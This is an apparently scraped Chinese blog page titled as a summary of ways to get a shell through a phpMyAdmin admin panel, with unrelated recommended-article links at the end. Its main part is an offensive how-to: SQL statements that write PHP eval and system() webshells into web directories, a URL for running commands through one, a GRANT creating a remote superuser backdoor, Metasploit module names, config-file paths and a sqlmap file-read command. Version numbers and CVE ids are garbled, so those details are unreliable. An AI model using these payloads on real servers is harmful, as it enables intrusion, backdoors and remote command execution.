方法一:
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/.php
一句话连接密码:xiaoma

方法二:
 Create TABLE xiaoma (xiaoma1 text NOT NULL);
 Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
 select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
 Drop TABLE IF EXISTS xiaoma;

方法三:

读取文件内容:    select load_file('E:/xamp/www/s.php');

写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'

cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'

方法四:
 select load_file('E:/xamp/www/xiaoma.php');

 select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'

 然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir

phpmyadmin 漏洞总结 (-- ::)
一: 影响版本: < -rc3

    概述:PhpMyAdmin存在PREG_REPLACE_EVAL漏洞

    利用模块:exploit/multi/http/phpmyadmin_preg_replace

    CVE: CVE--

    二: 影响版本:phpMyAdmin v3.

    概述:PhpMyAdmin存在server_sync.php 后门漏洞

    利用模块:exploit/multi/http/phpmyadmin_3522_backdoor

    CVE: CVE--

    三: 影响版本: .x < 3.1.3.1;

    概述:PhpMyAdmin配置文件/config/config.inc.php存在命令执行

    利用模块:exploit/unix/webapp/phpmyadmin_config

    CVE: CVE--

.  影响版本:phpmyadmin --phpmyadmin 2.11.4利用方式:直接在phpmyadmin的用户名内填入:  密码空
'localhost'@'@"
复制代码5. phpMyAdmin < .x Swekey远程代码注入攻击

. phpmyadmin 2.80 反序列 lfi、 rfi包含 漏洞文件 ss

phpmyadmin一句话开启外链mysql :添加超级用户guetsec密码ooxx并且允许外连 

GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WITH GRANT OPTION;

phpmyadmin 暴绝对路径: 

. 用Web路径自动盲爆工具 V2. 乌云内测(带字典).rar

.扫phpinfo.php  info.php  php.php  test.php等等

. 上传图片 超长文件名!

.phpmyadmin构造xml上传暴路径

.phpmyadmin读取系统文件cmd爆路径!

.phpmyadmin读取 iis6,iis7配置文件  读取apache  Nginx 配置文件!

windows2003 iis6配置文件所在位置C:\Windows/system32\inetsrv\metabase.xml
win2008/ iis7. 在这个文件C:\Windows\System32\inetsrv\config\applicationHost.config
apache配置:/etc/httpd/conf/httpd.conf

/usr/local/apache2/conf/httpd.conf 

Nginx配置  /etc/nginx/conf.d/vhost.conf
                /usr/local/etc/nginx/nginx.conf
穿山甲只能读一部分,  上sqlmap

sqlmap -u url --file-read 'C:\Windows\System32\inetsrv\config\applicationHost.config'

phpmyadmin后台拿shell方法总结的更多相关文章

  1. KesionCMS V6.5后台拿SHELL方法

    Title:KesionCMS V6.5后台拿SHELL方法  --2011-03-29 00:21 最近弄一个站点,是KesionCMS V6.5的WEB系统,试了下后台拿webshell方法,记下 ...

  2. PhpMyadmin后台拿webshell方法总结

    前言: phpmyadmin后台拿webshell的方法主要分为两个方法: (1) .通过日志文件拿webshell; (2) .利用日志文件写入一句话;(这个方法可能在实际操作中会遇到困难): 本地 ...

  3. 在phpmyadmin后台获取webshell方法汇总整理

    方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma ...

  4. phpmyadmin后台4种拿shell方法 && php爆路径大法

    php后台拿shell要知道php的路径,文章下面将讲诉爆php路径的方法!!! 方法一: CREATE TABLE `mysql`.`xss` (`xss1` TEXT NOT NULL ); IN ...

  5. linux系统ecshop拿shell方法

    Title:linux系统ecshop拿shell方法  --2011-06-08 13:23 最近弄一个站,对ECSHOP拿shell不了解,导致走了很多的弯路. nginx/0.8.54的服务器, ...

  6. Linux后台执行的方法 - 关闭、退出不影响

    =============================================================================================nohup c ...

  7. 利用SQL注入漏洞登录后台的实现方法

    利用SQL注入漏洞登录后台的实现方法 作者: 字体:[增加 减小] 类型:转载 时间:2012-01-12我要评论 工作需要,得好好补习下关于WEB安全方面的相关知识,故撰此文,权当总结,别无它意.读 ...

  8. JQuery EasyUI弹出对话框解决Asp.net服务器控件无法执行后台代码的方法(转)

    原文:JQuery EasyUI弹出对话框解决Asp.net服务器控件无法执行后台代码的方法 jquery-easyui是一个基于jquery的图形界面插件,利用easyui可以创建很多好看的网页界面 ...

  9. CreateLiveCMSV4.0 漏洞,无需后台Get shell

    Title:CreateLiveCMSV4.0 漏洞,无需后台Get shell --2012-03-06 17:28 标题:CreateLive CMS Version 4.0.1006 漏洞,无需 ...

随机推荐

  1. [js开源组件开发]-手机端照片预览组件

    手机端照片预览组件 可怜的我用着华为3C手机,用别人现成的组件都好卡,为了适应我这种屌丝,于是自己简化写了一版的照片预览效果,暂时无缩放功能,以后可能有空再加吧,你也可以自己加下,这是个github上 ...

  2. 3种 web 会话管理的方式

    转自:http://www.yidianzixun.com/n/0F1GYAsQ?s=8&appid=xiaomi&ver=3.7.8&utk=4lxc4q7c&fro ...

  3. 2015年第11本:代码整洁之道Clean Code

    前一段时间一直在看英文小说,在读到<Before I fall>这本书时,读了40%多实在看不下去了,受不了美国人啰啰嗦嗦的写作风格,还是读IT专业书吧. 从5月9日开始看<代码整洁 ...

  4. 2015年第4本(英文第3本):Godfather教父

    2015年的第4本书,第3本英文书. 书名:Godfather ,中文书名<教父> 作者: Mario Puzo 单词数:17万 词汇量:1万 首万词不重复词数:2200(这个我不太相信) ...

  5. 在Windows下将code style导入到Android Studio的方法

    很多网站上提供了Ahdroid studio的“代码样式”文件,那么作为win平台的用户,我们就需要学会如何导入这个样式文件.我也是查了很久才知道是怎么导入的,下面就是我的经验分享. 一.下载代码样式 ...

  6. C标准库<string.h>实现

    本文地址:http://www.cnblogs.com/archimedes/p/c-library-string.html,转载请注明源地址. 1.背景知识 <string.h>中声明的 ...

  7. KVC实现原理简介

    KVC,全称:Key-Value-Coding. KVC运用了isa-swizzling技术.isa-swizzling就是类型混合指针机制.KVC主要通过isa-swizzling来实现其内部定位查 ...

  8. linux终端python自动提示

    linux终端python自动提示 很多时候,在linux下编写python时, 都懒得去vi一个新文件,直接就新开一个终端, 进入python命令行模式,然后就可以写一些测试代码. 不过最悲剧的就是 ...

  9. 蓝牙防丢器原理、实现与Android BLE接口编程

    本文是对已实现的蓝牙防丢器项目的总结,阐述蓝牙防丢器的原理.实现与android客户端的蓝牙BLE接口编程.在这里重点关注如何利用BLE接口来进行工程实现,对于BLE的协议.涉及到JNI的BLE接口内 ...

  10. iOS 清理缓存功能的实现第二种方法

    /** * 清理缓存第二种方法 * * @param sender <#sender description#> */ - (void)clearCache:(id)sender { // ...